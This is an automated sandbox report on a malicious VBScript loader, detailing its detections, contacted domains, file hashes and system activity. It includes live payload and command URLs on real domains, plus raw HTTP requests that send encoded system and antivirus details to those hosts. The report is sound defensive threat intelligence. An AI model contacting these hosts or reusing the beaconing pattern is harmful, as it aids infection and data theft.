MSG_185943.vbs
This report is generated from a file or URL submitted to this webservice on March 28th 2020 07:00:11 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 3 domains and 3 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Additional Context
Related Sandbox Artifacts
- Associated SHA256s
- 582337fe47cd15cae363596644dbea643a871a6b648b77549d610f72e544fb43
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 5
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 9/59 Antivirus vendors marked sample as malicious (15% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "160.153.128.4": ...
URL: http://cheron.co.uk/ (AV positives: 4/76 scanned on 03/27/2020 18:59:48)
URL: http://cheron.co.uk/location/444444.png?uid=vwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgatadyalaaxacwamab8aeiaaqb0agqazqbmaguabgbkaguacgagaeeabgb0agkadgbpahiadqbzac0anaasadeamaasadaafabnagkaywbyag8acwbvagyadaagafcaaqbuagqabwb3ahmaiaaxadaaiabgageabqbpagwabablaa== (AV positives: 4/76 scanned on 03/27/2020 15:42:30)
URL: http://cheron.co.uk/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAARQBtAGIAZQBkAGQAZQBkACAAUwB0AGEAbgBkAGEAcgBkACAA (AV positives: 6/76 scanned on 03/27/2020 10:36:37)
URL: http://cheron.co.uk/location/444444.png?uid=VAByAGUAbgBkACAATQBpAGMAcgBvACAAUwBlAGMAdQByAGkAdAB5ACAAQQBnAGUAbgB0AC0ANAAsADEAMAAsADAAfABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAC0ANgAsADEALAAwAHwATQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAAMQAwACAAUAByAG8A (AV positives: 5/76 scanned on 03/27/2020 01:47:41)
URL: http://cheron.co.uk/location/444444.pnguid=tqbpagmacgbvahmabwbmahqaiabxagkabgbkag8adwbzacaanwagafaacgbvagyazqbzahmaaqbvag4ayqbsacaa (AV positives: 4/76 scanned on 03/26/2020 21:37:36)
File SHA256: a8d0d7910d2d9e22ea623c21cde7a858417d2785154648b09211d86b63828361 (Date: 03/27/2020 09:53:10)
File SHA256: 864deeb60830ce05f1be347929f4a8dbd135037139e34d9b08cd7ed9a0fb5030 (Date: 03/25/2020 18:20:56)
File SHA256: c6f72b8cea65c1c5130c6f2617641ae1a86107b63f17632f528a46252d118537 (Date: 03/25/2020 18:14:47)
File SHA256: b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709 (Date: 03/25/2020 17:25:52)
File SHA256: f25ae8e60b3c41f9bb27b389a3e12561ec30b392ca1cfae13c0560dc7784d801 (Date: 03/25/2020 11:35:48)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/74 scanned on 01/16/2020 11:24:19)
File SHA256: 3c1eb194a1b0c07b536d55b52f5ddbb4428c889b5c10d285f90dd4f361479ad6 (AV positives: 28/72 scanned on 11/07/2019 16:42:47)
File SHA256: 9e59350f7fe3283a0db299e18482eb25222592344e98ac44d7ee4fabe6caf791 (AV positives: 3/72 scanned on 09/20/2019 17:33:52)
File SHA256: eb2f5dbb680d9534ac5687d5aeb3a65de1e94c88ca440cffd7cbe16ed79e7cfa (AV positives: 8/71 scanned on 09/04/2019 06:06:32)
File SHA256: d5de1604b1a16db2169fd6dbede7d49490f0fca31aae69de2f17d00372911975 (AV positives: 6/72 scanned on 08/20/2019 04:12:15)
Found malicious artifacts related to "160.153.129.23": ...
URL: http://gabinetedepsicologia.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAARQBtAGIAZQBkAGQAZQBkACAAUwB0AGEAbgBkAGEAcgBkACAA (AV positives: 3/76 scanned on 03/27/2020 10:36:37)
URL: http://facebook.klantenservicebelgie.com/ (AV positives: 3/76 scanned on 03/26/2020 23:25:49)
URL: http://outlook.klantenservicebelgie.com/contact.html (AV positives: 3/76 scanned on 03/26/2020 23:10:19)
URL: http://gabinetedepsicologia.com/location/444444.png?uid=vwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgatadyalaaxacwamab8ae0aaqbjahiabwbzag8azgb0acaavwbpag4azabvahcacwagadeamaagafaacgbv (AV positives: 3/76 scanned on 03/26/2020 04:33:04)
URL: http://gabinetedepsicologia.com/location (AV positives: 1/76 scanned on 03/25/2020 20:29:00)
File SHA256: a8d0d7910d2d9e22ea623c21cde7a858417d2785154648b09211d86b63828361 (Date: 03/27/2020 09:53:10)
File SHA256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3 (AV positives: 1/75 scanned on 03/26/2020 13:16:16)
File SHA256: 864deeb60830ce05f1be347929f4a8dbd135037139e34d9b08cd7ed9a0fb5030 (Date: 03/25/2020 18:20:56)
File SHA256: c6f72b8cea65c1c5130c6f2617641ae1a86107b63f17632f528a46252d118537 (Date: 03/25/2020 18:14:47)
File SHA256: b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709 (Date: 03/25/2020 17:25:52)
File SHA256: bd1f4befe0ccc0467a8c882405e6f86959671d413f2511e230d393ec6f3f57ab (Date: 03/25/2020 05:07:33)
File SHA256: 16ce845440c38f491f80553aee7a8144dcc0a82c46258deaffdd10a0fa3d2db2 (AV positives: 1/72 scanned on 03/03/2020 05:37:52)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/72 scanned on 02/17/2020 11:20:40)
File SHA256: 84f1d1ffdc036768ffeba1be92362dcf619e7ce6ec27500ab47844ed24fc4230 (AV positives: 19/74 scanned on 01/29/2020 19:49:40)
File SHA256: 399c3592fbff1a1c12b4c97dc1f6720e1a3316ff33fbfa069bd7cf0fff40e606 (AV positives: 4/75 scanned on 01/29/2020 13:36:26)
Found malicious artifacts related to "23.229.248.72": ...
URL: https://clusterlacteoatlantico.com/ (AV positives: 5/76 scanned on 03/28/2020 02:42:12)
URL: http://clusterlacteoatlantico.com/location/444444.png?uid=uwbvahaaaabvahmaiabbag4adabpac0avgbpahiadqbzac0anqasadeamaasadaafabnagkaywbyag8acwbvagyadaagafcaaqbuagqabwb3ahmaiaa3acaauabyag8azgblahmacwbpag8abgbhagwaiaa= (AV positives: 7/76 scanned on 03/27/2020 15:42:39)
URL: http://clusterlacteoatlantico.com/ (AV positives: 4/76 scanned on 03/27/2020 14:51:48)
URL: http://clusterlacteoatlantico.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAARQBtAGIAZQBkAGQAZQBkACAAUwB0AGEAbgBkAGEAcgBkACAA (AV positives: 7/76 scanned on 03/27/2020 10:36:37)
URL: http://clusterlacteoatlantico.com/location/444444.png (AV positives: 6/76 scanned on 03/27/2020 01:15:55)
File SHA256: a8d0d7910d2d9e22ea623c21cde7a858417d2785154648b09211d86b63828361 (Date: 03/27/2020 09:53:10)
File SHA256: 864deeb60830ce05f1be347929f4a8dbd135037139e34d9b08cd7ed9a0fb5030 (Date: 03/25/2020 18:20:56)
File SHA256: c6f72b8cea65c1c5130c6f2617641ae1a86107b63f17632f528a46252d118537 (Date: 03/25/2020 18:14:47)
File SHA256: b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709 (Date: 03/25/2020 17:25:52)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/69 scanned on 02/04/2019 12:42:22)
File SHA256: 17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8 (AV positives: 1/56 scanned on 03/21/2018 16:46:52)
File SHA256: 43271db404383b3cb6bc652a450a14e3f04cff2c7014ef3321a7afb2570f75cd (AV positives: 19/60 scanned on 11/03/2017 07:03:17)
File SHA256: 9c6ef4ca19918d9fb42988d0a8705ca604c7c31334592b1cab8d761d93b3900f (AV positives: 9/57 scanned on 10/05/2015 11:43:56) - source
- Network Traffic
- relevance
- 10/10
-
Multiple malicious artifacts seen in the context of different hosts
- details
-
Found malicious artifacts related to "160.153.128.4": ...
URL: http://cheron.co.uk/ (AV positives: 4/76 scanned on 03/27/2020 18:59:48)
URL: http://cheron.co.uk/location/444444.png?uid=vwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgatadyalaaxacwamab8aeiaaqb0agqazqbmaguabgbkaguacgagaeeabgb0agkadgbpahiadqbzac0anaasadeamaasadaafabnagkaywbyag8acwbvagyadaagafcaaqbuagqabwb3ahmaiaaxadaaiabgageabqbpagwabablaa== (AV positives: 4/76 scanned on 03/27/2020 15:42:30)
URL: http://cheron.co.uk/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAARQBtAGIAZQBkAGQAZQBkACAAUwB0AGEAbgBkAGEAcgBkACAA (AV positives: 6/76 scanned on 03/27/2020 10:36:37)
URL: http://cheron.co.uk/location/444444.png?uid=VAByAGUAbgBkACAATQBpAGMAcgBvACAAUwBlAGMAdQByAGkAdAB5ACAAQQBnAGUAbgB0AC0ANAAsADEAMAAsADAAfABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAC0ANgAsADEALAAwAHwATQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAAMQAwACAAUAByAG8A (AV positives: 5/76 scanned on 03/27/2020 01:47:41)
URL: http://cheron.co.uk/location/444444.pnguid=tqbpagmacgbvahmabwbmahqaiabxagkabgbkag8adwbzacaanwagafaacgbvagyazqbzahmaaqbvag4ayqbsacaa (AV positives: 4/76 scanned on 03/26/2020 21:37:36)
File SHA256: a8d0d7910d2d9e22ea623c21cde7a858417d2785154648b09211d86b63828361 (Date: 03/27/2020 09:53:10)
File SHA256: 864deeb60830ce05f1be347929f4a8dbd135037139e34d9b08cd7ed9a0fb5030 (Date: 03/25/2020 18:20:56)
File SHA256: c6f72b8cea65c1c5130c6f2617641ae1a86107b63f17632f528a46252d118537 (Date: 03/25/2020 18:14:47)
File SHA256: b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709 (Date: 03/25/2020 17:25:52)
File SHA256: f25ae8e60b3c41f9bb27b389a3e12561ec30b392ca1cfae13c0560dc7784d801 (Date: 03/25/2020 11:35:48)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/74 scanned on 01/16/2020 11:24:19)
File SHA256: 3c1eb194a1b0c07b536d55b52f5ddbb4428c889b5c10d285f90dd4f361479ad6 (AV positives: 28/72 scanned on 11/07/2019 16:42:47)
File SHA256: 9e59350f7fe3283a0db299e18482eb25222592344e98ac44d7ee4fabe6caf791 (AV positives: 3/72 scanned on 09/20/2019 17:33:52)
File SHA256: eb2f5dbb680d9534ac5687d5aeb3a65de1e94c88ca440cffd7cbe16ed79e7cfa (AV positives: 8/71 scanned on 09/04/2019 06:06:32)
File SHA256: d5de1604b1a16db2169fd6dbede7d49490f0fca31aae69de2f17d00372911975 (AV positives: 6/72 scanned on 08/20/2019 04:12:15)
Found malicious artifacts related to "160.153.129.23": ...
URL: http://gabinetedepsicologia.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAARQBtAGIAZQBkAGQAZQBkACAAUwB0AGEAbgBkAGEAcgBkACAA (AV positives: 3/76 scanned on 03/27/2020 10:36:37)
URL: http://facebook.klantenservicebelgie.com/ (AV positives: 3/76 scanned on 03/26/2020 23:25:49)
URL: http://outlook.klantenservicebelgie.com/contact.html (AV positives: 3/76 scanned on 03/26/2020 23:10:19)
URL: http://gabinetedepsicologia.com/location/444444.png?uid=vwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgatadyalaaxacwamab8ae0aaqbjahiabwbzag8azgb0acaavwbpag4azabvahcacwagadeamaagafaacgbv (AV positives: 3/76 scanned on 03/26/2020 04:33:04)
URL: http://gabinetedepsicologia.com/location (AV positives: 1/76 scanned on 03/25/2020 20:29:00)
File SHA256: a8d0d7910d2d9e22ea623c21cde7a858417d2785154648b09211d86b63828361 (Date: 03/27/2020 09:53:10)
File SHA256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3 (AV positives: 1/75 scanned on 03/26/2020 13:16:16)
File SHA256: 864deeb60830ce05f1be347929f4a8dbd135037139e34d9b08cd7ed9a0fb5030 (Date: 03/25/2020 18:20:56)
File SHA256: c6f72b8cea65c1c5130c6f2617641ae1a86107b63f17632f528a46252d118537 (Date: 03/25/2020 18:14:47)
File SHA256: b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709 (Date: 03/25/2020 17:25:52)
File SHA256: bd1f4befe0ccc0467a8c882405e6f86959671d413f2511e230d393ec6f3f57ab (Date: 03/25/2020 05:07:33)
File SHA256: 16ce845440c38f491f80553aee7a8144dcc0a82c46258deaffdd10a0fa3d2db2 (AV positives: 1/72 scanned on 03/03/2020 05:37:52)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/72 scanned on 02/17/2020 11:20:40)
File SHA256: 84f1d1ffdc036768ffeba1be92362dcf619e7ce6ec27500ab47844ed24fc4230 (AV positives: 19/74 scanned on 01/29/2020 19:49:40)
File SHA256: 399c3592fbff1a1c12b4c97dc1f6720e1a3316ff33fbfa069bd7cf0fff40e606 (AV positives: 4/75 scanned on 01/29/2020 13:36:26)
Found malicious artifacts related to "23.229.248.72": ...
URL: https://clusterlacteoatlantico.com/ (AV positives: 5/76 scanned on 03/28/2020 02:42:12)
URL: http://clusterlacteoatlantico.com/location/444444.png?uid=uwbvahaaaabvahmaiabbag4adabpac0avgbpahiadqbzac0anqasadeamaasadaafabnagkaywbyag8acwbvagyadaagafcaaqbuagqabwb3ahmaiaa3acaauabyag8azgblahmacwbpag8abgbhagwaiaa= (AV positives: 7/76 scanned on 03/27/2020 15:42:39)
URL: http://clusterlacteoatlantico.com/ (AV positives: 4/76 scanned on 03/27/2020 14:51:48)
URL: http://clusterlacteoatlantico.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAARQBtAGIAZQBkAGQAZQBkACAAUwB0AGEAbgBkAGEAcgBkACAA (AV positives: 7/76 scanned on 03/27/2020 10:36:37)
URL: http://clusterlacteoatlantico.com/location/444444.png (AV positives: 6/76 scanned on 03/27/2020 01:15:55)
File SHA256: a8d0d7910d2d9e22ea623c21cde7a858417d2785154648b09211d86b63828361 (Date: 03/27/2020 09:53:10)
File SHA256: 864deeb60830ce05f1be347929f4a8dbd135037139e34d9b08cd7ed9a0fb5030 (Date: 03/25/2020 18:20:56)
File SHA256: c6f72b8cea65c1c5130c6f2617641ae1a86107b63f17632f528a46252d118537 (Date: 03/25/2020 18:14:47)
File SHA256: b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709 (Date: 03/25/2020 17:25:52)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/69 scanned on 02/04/2019 12:42:22)
File SHA256: 17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8 (AV positives: 1/56 scanned on 03/21/2018 16:46:52)
File SHA256: 43271db404383b3cb6bc652a450a14e3f04cff2c7014ef3321a7afb2570f75cd (AV positives: 19/60 scanned on 11/03/2017 07:03:17)
File SHA256: 9c6ef4ca19918d9fb42988d0a8705ca604c7c31334592b1cab8d761d93b3900f (AV positives: 9/57 scanned on 10/05/2015 11:43:56) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 5
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
-
"ngs depopulators mildewing metaphosphated untempested anticensoriously coworkers apple-twig 'abashlessly Perse Algarve trimellic villa-haunted isomery unshaled water-jacket smirkle nonfavorableness savours countermoves Abassin winding-sheet frocking unavenued precommercial frosty-natured uncontainableness barneys cerebrospinant smilet gawps anthropolite chob gallybagger myc hypsochromy hatchets Pareioplitae zaniness Fawnskin outdated redbaiting cnemis ignitive Mzi chronographs cutdown craked lanolines scissile pharyngoscope computerize Doricize Phalangides bathtubful absent Larussell gassings endenizen grieves large-scaled blacklists automower blue-sky pantheons habenal karyomitosis Tapa south-south-west anticonscription unimpoverished datapoint aforetimes spun-out nonbasement circumscribes secessions Cloanthus KSH reperk belt-tightening monodize unobservingly unmutually nontemperamental LISA mispracticing frangipane bretesse ashamnu apogonid urethrobulbar memos culeus gabbarts Bornstein outrecuidance Durware" (Indicator: "ntice")
"phthalmia refool jinrickshaw scopola aglisten duplexs Bascio marechale Mamertino mastheads many-mouthed 'nonuniformly decentred workship guardedly iliads superprecisely maniacs composture aromatous antiuating subendorsed hydrosorbic stone-wall supersulfureted misdoubted jube biloculine unguiculated deplaster liverberries turnoffs spumante Tamonea aglobulism supraseptal angiocholecystitis transvenom undeeded sultrier forewarns reichstaler Caprifoliaceae adventual bealing grafting Jugoslav sternoclidomastoid torsionless unspuriousness imparasitic superremuneration house-search grotesquery Cupertino powerless ogenetic Minnesota formiate terror-fleet grand-uncle relettering ballets anglicanisms doubleness Lushai hassle patulin transactionally jelliedness feminal semicursive Winnetoon bay-salt embargo purposivism lenticels necrologically contentednesses Millingtonia uniplex Sibyl paraffiny neurochemist dreamlessness monestrous flower-sucking ponderability baubles sunkie re-rejection reamers disject diminutiveness" (Indicator: "ntice")
"y spotlights desilvers albuminose nonconcur cantatrice skilder coin-operated deaminated brailing green-haired circuitable Giesser Mogadiscio Dendromecon mamboes cullis shutter dewanship humbled retesting pounded plumer cardiovascular amylophosphoric counterwill reshowed demasculinising Valladolid giddier veligerous holometabolous intrans.
'Antigonus schistomelia psoralen siderosilicosis mis-see intermedious Artamus placid Dorize Rives discharge Cadogan Taxeopoda extemporaneity palechinoid prebarbaric interminister Janine mangerite exclusionism upmix loam definitising ramosopinnate afterwitted descriptionless rewore carneous nonfeatured varas Taliesin allituric barrages endospore road-bike undesisting untuberculous Physciaceae bepepper jotted Maribelle Keble tignum tripudist nonexerciser angletwitch Sinis tiderode waddent criniculture entices Exton auspicy bolivias beryllosis spinel-red reaphook grands decerebrate cumulonimbus figboy moisture-resisting foul-handed uriniferous subjectify re-earn roommate world" (Indicator: "ntice")
"ng nonblamable fucoidal self-weighted conducingly precondylar oestroid beforetimes deep-drenched rosinweed bedabbled chipchop water-broken adelopod replotment witherweight Gronchi unrationally world-sized pinnisected sward wordbook wedelns unsnaffled catatonic repunctuating Lurex hoveled well-appearing Brendan coitus Fen schnapps fairings hemospasia savvy underspreading packinghouse schmaltziest nonleguminous Natividad IPDU Lucia double-flowered servation cooptate stoloniferously well-trussed Massmonger death-bed Leao hoin pancakes Reckford Platycercinae saggier plugdrawer leucocholy Hopfinger silicomagnesian overplied low-principled stoopball streuselkuchen Vte Archiannelida agitpropist daffle daliance bilbo threepenny lenticellate haytime rationalised sleepy-souled khitmatgar parametrizing kops featherpated spectrometries semicarbonate substantiates prestandardize maiolica" (Indicator: "ntice")
"rinsable superscouts nonobese Monarchianist colorist Hauge acoine true-false entete retinae ecol. adenylic overvarying milters twitting debuggers Kerrie cabalic Anglicisation Cummings unaccumulable beauty-beaming infrangibleness eucgia tiger-looking lobato-digitate genae arbors Mahnomen slicken Cholula built-up yapa Balearica runby 'sensately Chontaquiro potlikker titlarks automatontons Polymastigina capitle gristles anticephalalgic quoits waspnesting codifies Weiser rushy Rover unprosaic rereign superindifferently molybdenic superreformation infectors rotational wagework magnirostrate rotten-rich slanderful other-self Vas Lowville yucking Miett callbacks Donielle opiniativeness coenjoy jackscrews Zeiger streptococcal unprismatically reincluded FPU bhaiachara pinda unfrizzy asthenolith Lumpkin uncivilizing cloudburst competitors retromammary prestudying tween-deck exalters Orrick gippers mashies prescribed squirarch Moniz suppressants vamosed mermaid Jacki fuzed sea-foam half-sightedly alkalinised surg ceremo" (Indicator: "ntice")
"ann polyhedric Milroy revaccinating heredotuberculosis becometh fettstein timers shorl ryes transplendent spinnaker generatively etcetera melodramatising aristocratically meros cassideous cognise blepharitis merbaby plaustral Halopsychidae Koli apraxic ketches Archaeozoic
FHDuTKvkqOqdsGUnjCwZoTvPCWHvdbrT=Log(vexIIycwdJOsuraKdtDFAUEmvxM)'watchcry unctuously prediabetes prochronistic Caras Jussieuan someonell Renner metrodynia rejuvenated OKeeffe spike-pitcher ignominiously circumsession Hernshaw paracotoin reckling pucks lazys Asclepiadae linguists havartis pleasantry put-and-take gladiatrix wagaun sunshineless extensibility droughtiness charrs batrachophagous motley-minded enosises sequestrable townees prelicense gybes lichenology roseolas Main bright-robed lightheadedly Puncheon palmati- lenticel timeshares Ronni Northumb MVY brawlingly prediscretionary vinegarweed Sartish Papua Dominus Henn charms ultrasanguine figulines versiera band-tailed gyneocracy Jardena untranquillising consolidator eluctate leveche" (Indicator: "ntice") - source
- File/Memory
- relevance
- 2/10
-
Possibly checks for known debuggers/analysis tools
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
4/76 reputation engines marked "http://clusterlacteoatlantico.com" as malicious (5% detection rate)
4/76 reputation engines marked "http://cheron.co.uk" as malicious (5% detection rate) - source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
Installation/Persistance
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""C:\MSG_185943.vbs"" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Loads the task scheduler COM API
- details
-
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 731B0000
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 00AF0000 - source
- Loaded Module
- relevance
- 5/10
- ATT&CK ID
- T1168 (Show technique in the MITRE ATT&CK™ matrix)
-
Executes a visual basic script
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 160.153.128.4 on port 80 is sent without HTTP header
TCP traffic to 160.153.129.23 on port 80 is sent without HTTP header
TCP traffic to 23.229.248.72 on port 80 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
-
Informative 11
-
General
-
Contacts domains
- details
-
"cheron.co.uk"
"gabinetedepsicologia.com"
"clusterlacteoatlantico.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"160.153.128.4:80"
"160.153.129.23:80"
"23.229.248.72:80" - source
- Network Traffic
- relevance
- 1/10
-
Loads the .NET runtime environment
- details
- "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 69970000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ... - source
- API Call
- relevance
- 10/10
-
Overview of unique CLSIDs touched in registry
- details
-
"wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
"wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
"wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
"wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
"wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
"wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
"wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
"wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
"wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
"wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
"wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
"wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
"wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
"wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
"wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
"wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
"wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
"wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS") - source
- Registry Access
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"wscript.exe" touched file "C:\Windows\System32\rsaenh.dll"
"wscript.exe" touched file "C:\Windows\System32\stdole2.tlb"
"wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
"wscript.exe" touched file "C:\Windows\System32\en-US\wscript.exe.mui"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
"wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll" - source
- API Call
- relevance
- 7/10
-
Touches files in the Windows directory
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "cheron.co.uk"
Heuristic match: "GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: cheron.co.uk"
Heuristic match: "gabinetedepsicologia.com"
Heuristic match: "GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: gabinetedepsicologia.com"
Heuristic match: "clusterlacteoatlantico.com"
